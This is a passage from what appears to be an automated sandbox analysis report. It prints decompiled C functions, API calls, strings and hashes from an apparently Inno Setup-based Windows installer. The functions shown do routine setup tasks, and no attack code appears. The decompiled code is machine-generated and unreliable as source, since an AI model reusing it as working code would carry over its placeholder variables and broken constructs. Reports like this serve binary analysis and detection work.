                                                            • Instruction Fuzzy Hash: 73319030E80209ABDB14EBE4C842BDEBBB5AF54308F118169E904B73D1D738AE458B55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B8998, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 94%
                                                            			E006B8998(char __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t61;
				intOrPtr _t66;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				intOrPtr _t99;

				_t100 = __eflags;
				_t95 = __esi;
				_t94 = __edi;
				_t68 = __ebx;
				_t97 = _t98;
				_t99 = _t98 + 0xffffffdc;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				 *[fs:eax] = _t99;
				_t27 =  *0x6cdec4; // 0x6d579c
				E005B8250( *_t27, L"Uninstall", __eflags);
				_t30 =  *0x6cdec4; // 0x6d579c
				ShowWindow( *( *_t30 + 0x188), 5);
				 *[fs:edx] = _t99;
				E006AF824();
				E005C745C( &_v20);
				E00424020(_v20);
				E005C6FB0(0, __ebx,  &_v24, __edi, __esi);
				E0040A5A8(0x6d68d0, _v24);
				E006B6C80(__ebx, __edi, __esi, _t100);
				_t44 =  *0x6d68d0; // 0x0
				E005C4F90(_t44, _t68,  &_v28, L".dat", _t94, _t95);
				E0040A5A8(0x6d68d4, _v28);
				_t48 =  *0x6d68d0; // 0x0
				E005C4F90(_t48, _t68,  &_v32, L".msg", _t94, _t95);
				E0040A5A8(0x6d68d8, _v32);
				_v8 = E005CBFB8(1, 1, 0, 2);
				 *[fs:eax] = _t99;
				 *((intOrPtr*)( *_v8 + 4))( *[fs:eax], 0x6b8af0, _t97,  *[fs:edx], 0x6b8c15, _t97,  *[fs:eax], 0x6b8c4e, _t97, __edi, __esi, __ebx, _t96);
				E005CBF78(_v8, _v40 - 8);
				E005CBF50(_v8, 8,  &_v16);
				if(_v16 == 0x67734d49) {
					_t61 =  *0x6d68d0; // 0x0
					E005CD6BC(_t61, _t68, 1, _v12, _t94, _t95);
				} else {
					_t66 =  *0x6d68d8; // 0x0
					E005CD6BC(_t66, _t68, 1, 0, _t94, _t95);
				}
				_pop(_t92);
				 *[fs:eax] = _t92;
				_push(E006B8AF7);
				return E00408444(_v8);
			}






















                                                            0x006b8998
                                                            0x006b8998
                                                            0x006b8998
                                                            0x006b8998
                                                            0x006b8999
                                                            0x006b899b
                                                            0x006b89a3
                                                            0x006b89a6
                                                            0x006b89a9
                                                            0x006b89ac
                                                            0x006b89ba
                                                            0x006b89bd
                                                            0x006b89c9
                                                            0x006b89d0
                                                            0x006b89de
                                                            0x006b89ee
                                                            0x006b89f1
                                                            0x006b89f9
                                                            0x006b8a01
                                                            0x006b8a0b
                                                            0x006b8a18
                                                            0x006b8a1d
                                                            0x006b8a2a
                                                            0x006b8a2f
                                                            0x006b8a3c
                                                            0x006b8a49
                                                            0x006b8a4e
                                                            0x006b8a5b
                                                            0x006b8a78
                                                            0x006b8a86
                                                            0x006b8a91
                                                            0x006b8a9d
                                                            0x006b8aad
                                                            0x006b8ab9
                                                            0x006b8ad0
                                                            0x006b8ad5
                                                            0x006b8abb
                                                            0x006b8abf
                                                            0x006b8ac4
                                                            0x006b8ac4
                                                            0x006b8adc
                                                            0x006b8adf
                                                            0x006b8ae2
                                                            0x006b8aef

                                                            APIs
                                                              • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                            • ShowWindow.USER32(?,00000005,00000000,006B8C4E,?,?,00000000), ref: 006B89DE
                                                              • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                              • Part of subcall function 00424020: SetCurrentDirectoryW.KERNEL32(00000000,?,006B8A06,00000000,006B8C15,?,?,00000005,00000000,006B8C4E,?,?,00000000), ref: 0042402B
                                                              • Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                            • String ID: .dat$.msg$IMsg$Uninstall
                                                            • API String ID: 3312786188-1660910688
                                                            • Opcode ID: f3279caf476708547096f2985ea174fc674a0b957c50a9dc1f64524f0346753e
                                                            • Instruction ID: 43941ce92546cf1f75effb4615d96ab71b8b1f254b2d248514a95b56d5af6042
                                                            • Opcode Fuzzy Hash: f3279caf476708547096f2985ea174fc674a0b957c50a9dc1f64524f0346753e
                                                            • Instruction Fuzzy Hash: 65415CB0A002059FC700EFA4CD96E9EBBB6FB88304F51846AF400A7751DB75AE41DFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006153AC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 94%
                                                            			E006153AC(struct HWND__* __eax, signed char __edx, void* __ebp) {
				char _v16;
				signed char _v20;
				char _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t8;
				struct HWND__* _t14;
				void* _t21;
				intOrPtr* _t22;
				struct HWND__* _t28;
				void* _t29;
				signed char* _t31;

				_t31 =  &_v20;
				 *_t31 = __edx;
				_t28 = __eax;
				_t21 = SendMessageW(__eax, 0xb06, 0, 0);
				if(_t21 != 0x6020000) {
					_v28 = _t21;
					_v24 = 0;
					_v20 = 0x6020000;
					_v16 = 0;
					_t23 = L"Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)";
					E00429044(_t21, L"Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)", 1, 0x6d62f8, _t28, 1,  &_v28);
					E004098C4();
				}
				 *0x6d62e4 = 1;
				 *0x6d62f4 = _t28;
				_t8 =  *0x615310; // 0x615368
				 *0x6d62f8 = E004785F8(E006158C4, _t8);
				if( *0x6d62f8 == 0) {
					E0060CD28(L"Failed to create DebugClientWnd", _t21);
				}
				_t29 = 4;
				_t22 =  *0x6cdb54; // 0x6cceb4
				do {
					E005C86E0( *0x6d62f8, _t23,  *_t22);
					_t22 = _t22 + 4;
					_t29 = _t29 - 1;
				} while (_t29 != 0);
				_t14 =  *0x6d62f4; // 0x0
				return SendMessageW(_t14, 0xb00,  *0x6d62f8,  *_t31 & 0x000000ff);
			}

















                                                            0x006153af
                                                            0x006153b2
                                                            0x006153b5
                                                            0x006153cb
                                                            0x006153d3
                                                            0x006153d5
                                                            0x006153d9
                                                            0x006153de
                                                            0x006153e6
                                                            0x006153f2
                                                            0x006153fe
                                                            0x00615403
                                                            0x00615403
                                                            0x00615408
                                                            0x0061540f
                                                            0x00615415
                                                            0x00615425
                                                            0x0061542a
                                                            0x00615431
                                                            0x00615431
                                                            0x00615436
                                                            0x0061543b
                                                            0x00615441
                                                            0x00615445
                                                            0x0061544a
                                                            0x0061544d
                                                            0x0061544d
                                                            0x0061545d
                                                            0x0061546e

                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000B06,00000000,00000000), ref: 006153C6
                                                            • SendMessageW.USER32(00000000,00000B00,00000000,00000000), ref: 00615463
                                                            Strings
                                                            • hSa, xrefs: 00615415
                                                            • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 006153F2
                                                            • Failed to create DebugClientWnd, xrefs: 0061542C
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd$hSa
                                                            • API String ID: 3850602802-2905362044
                                                            • Opcode ID: 0e412e84a358142af428e011a0e255765662ed08f503d990aefe787644027a64
                                                            • Instruction ID: bd2b79d17f40968884fe1c372ced24de8c60c917dea0cb25488337d16b2a65e4
                                                            • Opcode Fuzzy Hash: 0e412e84a358142af428e011a0e255765662ed08f503d990aefe787644027a64
                                                            • Instruction Fuzzy Hash: 391123B1A403129FE300EB28DC81FDABBD69F94304F08002AF5858B3D2D3749C84C766
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00624AA4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 63%
                                                            			E00624AA4(HANDLE* __eax) {
				HANDLE* _v8;
				long _v12;
				intOrPtr* _t7;
				long _t11;
				intOrPtr _t27;
				void* _t30;

				_v8 = __eax;
				_push(_t30);
				_push(0x624b25);
				_push( *[fs:edx]);
				 *[fs:edx] = _t30 + 0xfffffff8;
				do {
					_t7 =  *0x6cdec4; // 0x6d579c
					E005B8704( *_t7);
					_t11 = MsgWaitForMultipleObjects(1, _v8, 0, 0xffffffff, 0x4ff);
				} while (_t11 == 1);
				if(_t11 == 0xffffffff) {
					E0060CE84(L"MsgWaitForMultipleObjects");
				}
				if(GetExitCodeProcess( *_v8,  &_v12) == 0) {
					E0060CE84(L"GetExitCodeProcess");
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(E00624B2C);
				return CloseHandle( *_v8);
			}









                                                            0x00624aaa
                                                            0x00624aaf
                                                            0x00624ab0
                                                            0x00624ab5
                                                            0x00624ab8
                                                            0x00624abb
                                                            0x00624abb
                                                            0x00624ac2
                                                            0x00624ad6
                                                            0x00624adb
                                                            0x00624ae3
                                                            0x00624aea
                                                            0x00624aea
                                                            0x00624b00
                                                            0x00624b07
                                                            0x00624b07
                                                            0x00624b0e
                                                            0x00624b11
                                                            0x00624b14
                                                            0x00624b24

                                                            APIs
                                                            • MsgWaitForMultipleObjects.USER32 ref: 00624AD6
                                                            • GetExitCodeProcess.KERNEL32 ref: 00624AF9
                                                            • CloseHandle.KERNEL32(?,00624B2C,00000001,00000000,000000FF,000004FF,00000000,00624B25), ref: 00624B1F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                            • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                            • API String ID: 2573145106-3235461205
                                                            • Opcode ID: 5a47b888b64c9d71a21df3ce652ab4a6790a840d61fbcb63caf85f52caaf36c3
                                                            • Instruction ID: b445045a4a45572890d55b61ba1fda7f57045845c9b5a3357f52015174d7dfc9
                                                            • Opcode Fuzzy Hash: 5a47b888b64c9d71a21df3ce652ab4a6790a840d61fbcb63caf85f52caaf36c3
                                                            • Instruction Fuzzy Hash: CE01A234640605AFD710EFA8ED62E9977EAEB49721F200265F520D73D0DE74ED44CA19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004070B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004070B0(signed int __eax, void* __edx) {
				short _v530;
				short _v1052;
				short _v1056;
				short _v1058;
				signed int _t20;
				void* _t24;
				WCHAR* _t25;

				_t25 =  &_v1052;
				_t24 = __edx;
				_t20 = __eax;
				if(__eax != 0) {
					 *_t25 = (__eax & 0x000000ff) + 0x41 - 1;
					_v1058 = 0x3a;
					_v1056 = 0;
					GetCurrentDirectoryW(0x105,  &_v530);
					SetCurrentDirectoryW(_t25);
				}
				GetCurrentDirectoryW(0x105,  &_v1052);
				if(_t20 != 0) {
					SetCurrentDirectoryW( &_v530);
				}
				return E0040B318(_t24, 0x105,  &_v1052);
			}










                                                            0x004070b2
                                                            0x004070b8
                                                            0x004070ba
                                                            0x004070be
                                                            0x004070c8
                                                            0x004070cc
                                                            0x004070d3
                                                            0x004070e7
                                                            0x004070ed
                                                            0x004070ed
                                                            0x004070fc
                                                            0x00407103
                                                            0x0040710d
                                                            0x0040710d
                                                            0x0040712a

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070E7
                                                            • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 004070ED
                                                            • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070FC
                                                            • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 0040710D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID: :
                                                            • API String ID: 1611563598-336475711
                                                            • Opcode ID: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                            • Instruction ID: 4e46778bef482c884a40b6a77bd37b1cdf5980326a29a022de95e28d89e8e0a5
                                                            • Opcode Fuzzy Hash: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                            • Instruction Fuzzy Hash: 71F0627154474465D310E7658852BDB729CDF84348F04843E76C89B2D1E6BC5948979B
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0059BDE0, Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0059BDE0(int __eax, void* __edx) {
				void* __edi;
				void* __esi;
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t45;
				void* _t47;
				int _t48;
				intOrPtr* _t49;

				_t18 = __eax;
				_t49 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x80)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x78));
					if( *((intOrPtr*)(__eax + 0x78)) != 0) {
						return E0059BDE0(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E0059BF18(__eax, _t45, _t47));
					_t48 = _t18;
					_t40 = _t39 & 0xffffff00 | _t48 == 0x00000000;
					while(_t48 > 0) {
						_t45 = _t48 - 1;
						_t18 = GetMenuState(E0059BF18(_t49, _t45, _t48), _t45, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E0059BF18(_t49, _t45, _t48), _t45, 0x400);
							_t40 = 1;
						}
						_t48 = _t48 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t49 + 0x70)) != 0) {
							L14:
							E0059BC9C(_t49, _t45, _t48);
							L15:
							return  *((intOrPtr*)( *_t49 + 0x50))();
						}
						_t44 =  *0x59a1c4; // 0x59a21c
						if(E0040868C( *((intOrPtr*)(_t49 + 0x7c)), _t44) == 0 || GetMenuItemCount(E0059BF18(_t49, _t45, _t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t49 + 0xbc));
							 *(_t49 + 0xbc) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}












                                                            0x0059bde0
                                                            0x0059bde4
                                                            0x0059bdea
                                                            0x0059bdf4
                                                            0x0059bdf6
                                                            0x00000000
                                                            0x0059bdf6
                                                            0x0059be02
                                                            0x0059be07
                                                            0x00000000
                                                            0x0059be09
                                                            0x0059be1b
                                                            0x0059be20
                                                            0x0059be24
                                                            0x0059be29
                                                            0x0059be32
                                                            0x0059be3c
                                                            0x0059be43
                                                            0x0059be53
                                                            0x0059be58
                                                            0x0059be58
                                                            0x0059be5a
                                                            0x0059be5b
                                                            0x0059be61
                                                            0x0059be67
                                                            0x0059bea2
                                                            0x0059bea4
                                                            0x0059bea9
                                                            0x00000000
                                                            0x0059beaf
                                                            0x0059be6c
                                                            0x0059be79
                                                            0x00000000
                                                            0x0059be8c
                                                            0x0059be93
                                                            0x0059be9a
                                                            0x00000000
                                                            0x0059be9a
                                                            0x0059be79
                                                            0x0059be61
                                                            0x0059beb6

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
                                                            • Instruction ID: f6f51fa323c2004b4ed4a12cf3aa4c02228d8e81e9c13bd86265522dc6499af0
                                                            • Opcode Fuzzy Hash: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
                                                            • Instruction Fuzzy Hash: B01172A160425956FF706A7A6F09BEA3F9C7FD1745F050429BE419B283CB38CC458BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005B631C, Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 92%
                                                            			E005B631C() {
				intOrPtr _v4;
				void* _v8;
				int _t5;
				void* _t6;
				intOrPtr _t12;
				struct HHOOK__* _t14;
				void* _t19;
				void* _t20;

				if( *0x6d57c0 != 0) {
					_t14 =  *0x6d57c0; // 0x0
					UnhookWindowsHookEx(_t14);
				}
				 *0x6d57c0 = 0;
				_v4 = 0x6d57c4;
				_t5 = 0;
				asm("lock xchg [edx], eax");
				_v8 = 0;
				if(_v8 != 0) {
					_t6 =  *0x6d57bc; // 0x0
					SetEvent(_t6);
					if(GetCurrentThreadId() !=  *0x6d57b8) {
						while(MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff) != 0) {
							_t12 =  *0x6d579c; // 0x0
							E005B871C(_t12, _t19, _t20);
						}
					}
					_t5 = CloseHandle(_v8);
				}
				return _t5;
			}











                                                            0x005b6326
                                                            0x005b6328
                                                            0x005b632e
                                                            0x005b632e
                                                            0x005b6335
                                                            0x005b633a
                                                            0x005b6346
                                                            0x005b6348
                                                            0x005b634b
                                                            0x005b6352
                                                            0x005b6354
                                                            0x005b635a
                                                            0x005b636a
                                                            0x005b6378
                                                            0x005b636e
                                                            0x005b6373
                                                            0x005b6373
                                                            0x005b6378
                                                            0x005b6395
                                                            0x005b6395
                                                            0x005b639c

                                                            APIs
                                                            • UnhookWindowsHookEx.USER32(00000000), ref: 005B632E
                                                            • SetEvent.KERNEL32(00000000), ref: 005B635A
                                                            • GetCurrentThreadId.KERNEL32 ref: 005B635F
                                                            • MsgWaitForMultipleObjects.USER32 ref: 005B6388
                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 005B6395
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                            • String ID:
                                                            • API String ID: 2132507429-0
                                                            • Opcode ID: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
                                                            • Instruction ID: 777aa0f60006170efd8bf97b8faec0e2cbbea874aebe53a0ac6f8c30ff2fdbbe
                                                            • Opcode Fuzzy Hash: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
                                                            • Instruction Fuzzy Hash: 30018B70A09700EED700EB65DC45BAE37E9FB44715F604A2AF055C75D0DB38A480CB42
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B8F64, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 84%
                                                            			E006B8F64(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				WCHAR* _t43;
				char _t58;
				intOrPtr _t68;
				void* _t72;
				signed int _t74;
				void* _t78;

				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = __edx;
				_v16 = __eax;
				_push(_t78);
				_push(0x6b9062);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xffffffe4;
				E0040A1C8(_v20);
				E005C5428(_v16, 0,  &_v8);
				_t72 = 0;
				_t58 = 0;
				do {
					_v32 = _t58;
					_v28 = 0;
					E004244F8(L"isRS-%.3u.tmp", 0,  &_v32,  &_v24);
					E0040B4C8( &_v12, _v24, _v8);
					_t74 = GetFileAttributesW(E0040B278(_v12));
					if(_t74 == 0xffffffff) {
						L5:
						_t43 = E0040B278(_v12);
						if(MoveFileExW(E0040B278(_v16), _t43, 1) == 0) {
							_t72 = _t72 + 1;
							if(_t72 == 0xa) {
								break;
							}
							goto L8;
						}
						E0040A5A8(_v20, _v12);
						break;
					}
					if((_t74 & 0x00000010) != 0) {
						goto L8;
					}
					if((_t74 & 0x00000001) != 0) {
						SetFileAttributesW(E0040B278(_v12), _t74 & 0xfffffffe);
					}
					goto L5;
					L8:
					_t58 = _t58 + 1;
				} while (_t58 != 0x3e8);
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E006B9069);
				E0040A1C8( &_v24);
				return E0040A228( &_v12, 2);
			}
















                                                            0x006b8f6f
                                                            0x006b8f72
                                                            0x006b8f75
                                                            0x006b8f78
                                                            0x006b8f7b
                                                            0x006b8f80
                                                            0x006b8f81
                                                            0x006b8f86
                                                            0x006b8f89
                                                            0x006b8f8f
                                                            0x006b8f9a
                                                            0x006b8f9f
                                                            0x006b8fa1
                                                            0x006b8fa3
                                                            0x006b8fa7
                                                            0x006b8faa
                                                            0x006b8fb8
                                                            0x006b8fc6
                                                            0x006b8fd9
                                                            0x006b8fde
                                                            0x006b9002
                                                            0x006b9007
                                                            0x006b901d
                                                            0x006b902c
                                                            0x006b9030
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x006b9030
                                                            0x006b9025
                                                            0x00000000
                                                            0x006b9025
                                                            0x006b8fe6
                                                            0x00000000
                                                            0x00000000
                                                            0x006b8fee
                                                            0x006b8ffd
                                                            0x006b8ffd
                                                            0x00000000
                                                            0x006b9032
                                                            0x006b9032
                                                            0x006b9033
                                                            0x006b9041
                                                            0x006b9044
                                                            0x006b9047
                                                            0x006b904f
                                                            0x006b9061

                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE,?,?), ref: 006B8FD4
                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE), ref: 006B8FFD
                                                            • MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000), ref: 006B9016
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
